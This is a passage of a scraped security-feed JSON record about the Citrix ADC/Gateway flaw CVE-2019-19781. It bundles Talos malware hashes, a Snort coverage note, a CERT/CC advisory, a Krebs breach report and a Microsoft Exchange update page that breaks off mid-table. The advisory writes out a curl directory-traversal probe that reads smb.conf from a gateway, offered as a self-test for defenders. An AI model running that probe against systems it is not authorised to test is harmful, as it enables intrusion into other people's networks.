**[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n \n**SHA 256: **[c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94** **](<https://www.virustotal.com/gui/file/c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94/details>) \n**MD5: **7c38a43d2ed9af80932749f6e80fea6f \n**Typical Filename: **xme64-520.exe \n**Claimed Product: **N/A** ** \n**Detection Name: **PUA.Win.File.Coinminer::1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258](<https://www.virustotal.com/gui/file/d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258/details>)** ** \n**MD5:** a917d39a8ef125300f2f38ff1d1ab0db \n**Typical Filename: **FFChromeSetters \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Macsearch::agent.tht.talos \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2020-01-30T11:00:12", "published": "2020-01-30T11:00:12", "id": "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VpsmXEgBYno/threat-source-newsletter-jan-30-2020.html", "type": "talosblog", "title": "Threat Source newsletter (Jan. 30, 2020)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-15T21:25:49", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-VTnYmwu8m3c/Xhy-eerp0iI/AAAAAAAABag/IaZw8HUa2sMUAmJgZvkCC7JrtedOpg9AACLcBGAsYHQ/s1600/image1.png>)\n\n_By [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), with contributions from Dalton Schaadt. _ \n \n\n\n## Executive Summary\n\n \nRecently, the details of a critical vulnerability affecting Citrix Application Delivery Controller and Citrix Gateway servers were publicly disclosed. This vulnerability is currently being tracked using [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>). A public patch has not yet been released, however, Citrix has [released](<https://support.citrix.com/article/CTX267679>) recommendations for steps that affected organizations can take to help mitigate the risk associated with this vulnerability. Successful exploitation of CVE-2019-19781 could allow a remote attacker to execute arbitrary code on affected systems. \n \nThis vulnerability, which is a directory traversal vulnerability, affects multiple [versions](<https://support.citrix.com/article/CTX267027>) of these products. Since the public disclosure of this vulnerability, several proof-of-concept (PoC) tools have been publicly released that can be used by adversaries to scan for vulnerable systems and attempt to exploit the vulnerable condition to achieve remote code execution. There have been multiple public reports of mass-scanning and exploitation activity already being observed in the wild. As such, it is important that organizations are aware of this vulnerability and take steps to ensure that they mitigate the risk of attacks against their environment. \n \n\n\n## Talos coverage for CVE-2019-19781\n\n \nTalos has developed and released coverage for this vulnerability in the form of [Snort](<https://www.snort.org/products>) and [Firepower](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>) signatures. These signatures have been available since Dec. 24, 2019 and can be leveraged by organizations to protect their affected systems from possible exploitation attempts until an official patch is publicly released. \n \n**Snort SIDs:** 52512, 52513, 52603 \n \n", "modified": "2020-01-15T11:41:36", "published": "2020-01-15T11:41:36", "id": "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uCR7T0fZRUs/snort-rules-cve-2019-19781.html", "type": "talosblog", "title": "New Snort rules protect against recently discovered Citrix vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-05-27T18:55:51", "bulletinFamily": "info", "description": "### Overview \n\nA vulnerability been [identified](<https://support.citrix.com/article/CTX267027>) in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC, Citrix Gateway formerly known as NetScaler Gateway, and Citrix SDWAN WANOP that could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nCitrix has published a [security bulletin](<https://support.citrix.com/article/CTX267027>) that mentions a vulnerability that can be exploited to achieve arbitrary code execution by a remote, unauthenticated attacker. Although the bulletin does not describe details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) describe techniques to block the handling of requests that contain a directory traversal attempt (`/../`) and also requests that attempt to access the `/vpns/` directory.\n\nLimited testing has shown that the affected Citrix software fails to restrict access to perl scripts that are available via the `/vpns/` path. An unauthenticated remote attacker may be able to provide crafted content to these scripts that result in arbitrary code execution. One technique that has been [outlined](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>) involves the writing of an XML file using a directory traversal and the subsequent command execution by way of the [Perl Template Toolkit](<http://www.template-toolkit.org/>). Other exploitation techniques may be possible. \n \nA link of the following form can be used to determine if a system is affected: \n`https:// CITRIXGATEWAY /vpn/../vpns/cfg/smb.conf` \n \nFor example, the following curl command can be used: \n`curl https:// CITRIXGATEWAY /vpn/../vpns/cfg/smb.conf --path-as-is -k -f` \n \nThe \"` CITRIXGATEWAY `\" string should be replaced with the name or IP of the system you wish to test. If retrieving the link results in a 403 Forbidden error, then the mitigations outlined below have likely been applied. However, if retrieving the link results in the contents of a `smb.conf` file, then the system is vulnerable. \n \n--- \n \n### Impact \n\nBy exploiting this vulnerability, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCitrix has released updates in [Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>). The updated software is designed to prevent unauthenticated attackers from accessing certain web server features. If updates are unavailable for your platform, or if you are otherwise unable to apply updates, please consider the following workarounds: \n \n--- \n \n**Block the handling of specially-crafted requests** \n \nCitrix article [CTX267679](<https://support.citrix.com/article/CTX267679>) contains several mitigation options for this vulnerability, depending on what type of product installation is used. For example, on a stand-alone system, the following commands are reported to mitigate this vulnerability: \n\n\n`nable ns feature responder` \n`add responder action respondwith403 respondwith \"\\\"HTTP/1.1 403 Forbidden\\r\\\\r\\` \n`add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403` \n`bind responder global ctx267027 1 END -type REQ_OVERRIDE` \n`save config ` \n \n`shell nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0` \n`shell \"echo 'nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0' >> /nsconfig/rc.netscaler\"` \n`reboot` \nNote that other configurations, such as CLIP, and HA, the steps to mitigate this vulnerability may be different. Please see [CTX267679](<https://support.citrix.com/article/CTX267679>) for more details. \n \nAlso note that the above mitigation does not work on Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31, due to an altogether different bug. Release 12.1 users are recommended to update to an unaffected build and also apply mitigations for protection. \n--- \n \n### Vendor Information\n\n619785\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix Affected\n\nUpdated: January 08, 2020 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.citrix.com/article/CTX267027>\n * <https://support.citrix.com/article/CTX267679>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://support.citrix.com/article/CTX267027>\n * <https://support.citrix.com/article/CTX267679>\n * <https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>\n * <https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/>\n * <https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>\n * <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>\n * <https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>\n * <https://github.com/x1sec/x1sec.github.io/blob/master/CVE-2019-19781-DFIR.md>\n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n\n### Acknowledgements\n\nThis vulnerability was reported to the vendor by Mikhail Klyuchnikov of Positive Technologies.\n\nThis document was written by Art Manion and Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-19781](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19781>) \n---|--- \n**Date Public:** | 2019-12-17 \n**Date First Published:** | 2020-01-08 \n**Date Last Updated: ** | 2020-02-03 13:11 UTC \n**Document Revision: ** | 111 \n", "modified": "2020-02-03T13:11:00", "published": "2020-01-08T00:00:00", "id": "VU:619785", "href": "https://www.kb.cert.org/vuls/id/619785", "type": "cert", "title": "Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP web server vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2020-02-19T23:32:25", "bulletinFamily": "blog", "description": "Networking software giant **Citrix Systems** says malicious hackers were inside its networks for five months between 2018 and 2019, making off with personal and financial data on company employees, contractors, interns, job candidates and their dependents. The disclosure comes almost a year after Citrix acknowledged that digital intruders had broken in by probing its employee accounts for weak passwords.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2020/02/citrix-notice.png>)\n\nCitrix provides software used by hundreds of thousands of clients worldwide, including most of the Fortune 100 companies. It is perhaps best known for selling virtual private networking (VPN) software that lets users remotely access networks and computers over an encrypted connection.\n\nIn March 2019, the **Federal Bureau of Investigation** (FBI) alerted Citrix they had reason to believe cybercriminals had gained access to the company's internal network. The FBI told Citrix the hackers likely got in using a technique called \"[password spraying](<https://resources.infosecinstitute.com/password-spraying/>),\" a relatively crude but remarkably effective attack that attempts to access a large number of employee accounts (usernames/email addresses) using just a handful of common passwords.\n\nIn [a statement](<https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/>) released at the time, Citrix said it appeared hackers \"may have accessed and downloaded business documents,\" and that it was still working to identify what precisely was accessed or stolen.\n\nBut in a letter sent to affected individuals dated Feb. 10, 2020, Citrix disclosed additional details about the incident. According to the letter, the attackers \"had intermittent access\" to Citrix's internal network between Oct. 13, 2018 and Mar. 8, 2019, and that there was no evidence that the cybercrooks still remain in the company's systems.\n\nCitrix said the information taken by the intruders may have included Social Security Numbers or other tax identification numbers, driver's license numbers, passport numbers, financial account numbers, payment card numbers, and/or limited health claims information, such as health insurance participant identification number and/or claims information relating to date of service and provider name.\n\nIt is unclear how many people received this letter, but the communication suggests Citrix is contacting a broad range of individuals who work or worked for the company at some point, as well as those who applied for jobs or internships there and people who may have received health or other benefits from the company by virtue of having a family member employed by the company.\n\nCitrix's letter was prompted by laws in virtually all U.S. states that require companies to notify affected consumers of any incident that jeopardizes their personal and financial data. While the notification does not specify whether the attackers stole proprietary data about the company's software and internal operations, the intruders certainly had ample opportunity to access at least some of that information as well.\n\nShortly after Citrix initially disclosed the intrusion in March 2019, a little-known security company **Resecurity** [claimed](<https://web.archive.org/web/20190313082751/https://resecurity.com/blog/supply-chain-the-major-target-of-cyberespionage-groups/>) it had evidence Iranian hackers were responsible, had been in Citrix\u2019s network for years, and had offloaded terabytes of data. Resecurity also presented evidence that it notified Citrix of the breach as early as Dec. 28, 2018, a claim Citrix initially denied but later acknowledged.\n\nIranian hackers recently have been blamed for hacking VPN servers around the world in a bid to plant backdoors in large corporate networks. A [report released this week](<https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf>) (PDF) by security firm **ClearSky** details how Iran's government-backed hacking units have been busy exploiting security holes in popular VPN products from Citrix and a number of other software firms.\n\nClearSky says the attackers have focused on attacking VPN tools because they provide a long-lasting foothold at the targeted organizations, and frequently open the door to breaching additional companies through supply-chain attacks. The company says such tactics have allowed the Iranian hackers to gain persistent access to the networks of companies across a broad range of sectors, including IT, security, telecommunications, oil and gas, aviation, and government.\n\nAmong the VPN flaws available to attackers is a recently-patched vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in Citrix VPN servers dubbed \"Shitrix\" by some in the security community. The derisive nickname may have been chosen because while Citrix [initially warned customers about the vulnerability in mid-December 2019](<https://support.citrix.com/article/CTX267027>), it didn't start releasing patches to plug the holes until late January 2020 -- roughly two weeks after attackers started using [publicly released exploit code](<https://www.zdnet.com/article/proof-of-concept-code-published-for-citrix-bug-as-attacks-intensify/>) to break into vulnerable organizations.\n\nHow would your organization hold up to a password spraying attack? As the Citrix hack shows, if you don\u2019t know you should probably check, and then act on the results accordingly. It's a fair bet the bad guys are going to find out even if you don\u2019t.", "modified": "2020-02-19T15:55:04", "published": "2020-02-19T15:55:04", "id": "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "href": "https://krebsonsecurity.com/2020/02/hackers-were-inside-citrix-for-five-months/", "type": "krebs", "title": "Hackers Were Inside Citrix for Five Months", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2020-02-19T14:32:47", "bulletinFamily": "microsoft", "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2010: February 11, 2020</p><h2></h2><p>This update rollup is a security update that provides a security advisory in Microsoft Exchange.\u00a0To learn more about these\u00a0vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):</p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688\" managed-link=\"\" target=\"_blank\">CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><p>This update also fixes the following issue:</p><p class=\"indent-1\"><a data-content-id=\"4540267\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">4540267</a>\u00a0MSExchangeDelivery.exe or EdgeTransport.exe crashes in Exchange Server 2013 and Exchange Server 2010</p><h2>Known issues in this security update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur when you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to its usual state. To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see\u00a0<a aria-live=\"rude\" bookmark-id=\"\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536989\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?FamilyID=4d072d3e-153e-4a5a-859e-ad054fe24107\" managed-link=\"\" target=\"_blank\">Download Update Rollup 30 for Exchange Server 2010 SP3 (KB4536989)</a></li></ul><h2>Update detail information for Exchange Server 2010 SP3</h2><h3>Installation instructions for\u00a0Exchange Server 2010 SP3</h3><p>Learn more about <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/ff637981.aspx\" id=\"kb-link-6\" managed-link=\"\" target=\"_blank\">how to install the latest update rollup for Exchange Server 2010</a>.</p><p>Also, learn about the following update installation scenarios.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update on computers that aren't connected to the internet</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\">When you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:</div><div class=\"sbody-error\">Creating Native images for .Net assemblies.</div><div class=\"kb-collapsible kb-collapsible-collapsed\">This issue is caused by network requests to connect to the following website:<br/>\u00a0</div><div class=\"kb-collapsible kb-collapsible-collapsed\"><a data-content-id=\"\" data-content-type=\"\" href=\"http://crl.microsoft.com/pki/crl/products/codesigpca.crl\" target=\"_blank\">http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl</a><br/><br/>These network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue.<br/><br/>To fix this issue, follow these steps:<br/>\u00a0</div><ol><li><div class=\"kb-collapsible kb-collapsible-collapsed\">In Internet Explorer, select <strong class=\"uiterm\">Internet Options</strong>\u00a0on the <strong class=\"uiterm\">Tools</strong> menu, and then select <strong class=\"uiterm\">Advanced</strong>.</div></li><li><div class=\"kb-collapsible kb-collapsible-collapsed\">In the <strong class=\"uiterm\">Security</strong> section, clear the <strong class=\"uiterm\">Check for publisher's certificate revocation</strong> check box, and then select <strong class=\"uiterm\">OK</strong>.<br/><br/><strong>Note</strong> Clear this security option only if the computer is in a tightly-controlled environment.\u00a0\u00a0</div></li><li>When the Setup process is finished, select the <strong>Check for publisher's certificate revocation</strong> check box again.</li></ol></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update on computers that have customized Outlook Web App files</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><strong>Important </strong>Before you apply this update rollup, make a backup copy of any <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/ee633483(exchg.140).aspx\" id=\"kb-link-8\" managed-link=\"\" target=\"_blank\">customized Outlook Web App</a>\u00a0files.<br/><br/>When you apply an update rollup package, the update process updates the Outlook Web App files, if this is\u00a0required. Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.</p></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span>If your scenario\u00a0meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:</span></p><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>You're a CAS Proxy Deployment Guidance customer.</li><li>You have deployed <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/bb310763(exchg.140).aspx\" id=\"kb-link-9\" managed-link=\"\" target=\"_blank\">CAS-CAS proxying</a>.</li></ul><p><strong>Note </strong>For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.</p></div></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install this update on a DBCS version of Windows Server 2012</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p>You can't install or uninstall Update Rollup 30 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:</p><ol><li>In Control Panel, select\u00a0<strong>Clock, Region and Language</strong>, select\u00a0<strong>Region</strong>, and then select\u00a0<strong>Administrative</strong>.</li><li>In the\u00a0<strong>Language for non-Unicode programs</strong>\u00a0area, select\u00a0<strong>Change system locale</strong>.</li><li>In the\u00a0<strong>Current system locale</strong>\u00a0list, select\u00a0<strong>English (United States)</strong>, and then select\u00a0<strong>OK</strong>.</li></ol><p>After you successfully install or uninstall Update Rollup 30, revert this language setting, as appropriate.</p></div></div></div><h3 class=\"sbody-h3\">Restart requirement</h3><p>The required services are restarted automatically after\u00a0you apply this update rollup.</p><h3 class=\"sbody-h3\">Removal information</h3><p>To remove Update Rollup 30 for Exchange Server 2010 SP3, use the\u00a0<strong class=\"uiterm\">Add or Remove Programs</strong>\u00a0item in Control Panel to remove update <strong>KB4536989</strong>.</p><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200211\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: February 11, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released update:</p><ul><li><a data-content-id=\"4509410\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for Microsoft Exchange Server 2010: July 9, 2019</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Update Rollup 30 for Exchange Server 2010</td><td>Exchange2010-KB4536989-x64-en.msp</td><td>2DD3EB1C737743941FB56293BB9A68242F0F52E2</td><td>95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4</td></tr></tbody></table><h3>Exchange Server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Update Rollup 30 for Exchange Server 2010</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>A33e7066a3f143ef8386e08c4458051d_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Abv_dg.dll</td><td>14.3.470.0</td><td>898,992</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Addreplicatopfrecursive.ps1</td><td>Not applicable</td><td>13,837</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Addressbook.aspx</td><td>Not applicable</td><td>3,830</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>13,465</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Af46d2bd14db43e0b49619bd0eeb07ec_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Aggregatepfdata.ps1</td><td>Not applicable</td><td>17,393</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Airfilter.dll</td><td>14.3.470.0</td><td>49,584</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Airsynctistateparser.dll</td><td>14.3.470.0</td><td>83,376</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Alsperf.dll1</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>11,413</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,083,136</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>73,728</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Attachfiledialog.aspx</td><td>Not applicable</td><td>5,346</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Autodisc_web.config</td><td>Not applicable</td><td>89,637</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicaddressbook.aspx</td><td>Not applicable</td><td>4,217</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicattachmentmanager.aspx</td><td>Not applicable</td><td>3,826</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicautosaveinfo.aspx</td><td>Not applicable</td><td>4,255</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccalendaritemschedulingtab.aspx</td><td>Not applicable</td><td>6,908</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccalendarview.aspx</td><td>Not applicable</td><td>3,259</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccontactview.aspx</td><td>Not applicable</td><td>3,586</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccontactviewwebpart.aspx</td><td>Not applicable</td><td>2,485</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditcalendaritem.aspx</td><td>Not applicable</td><td>17,517</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditcontact.aspx</td><td>Not applicable</td><td>6,356</td><td>03-Jan-2020</td><td>05:49</td><td>Not 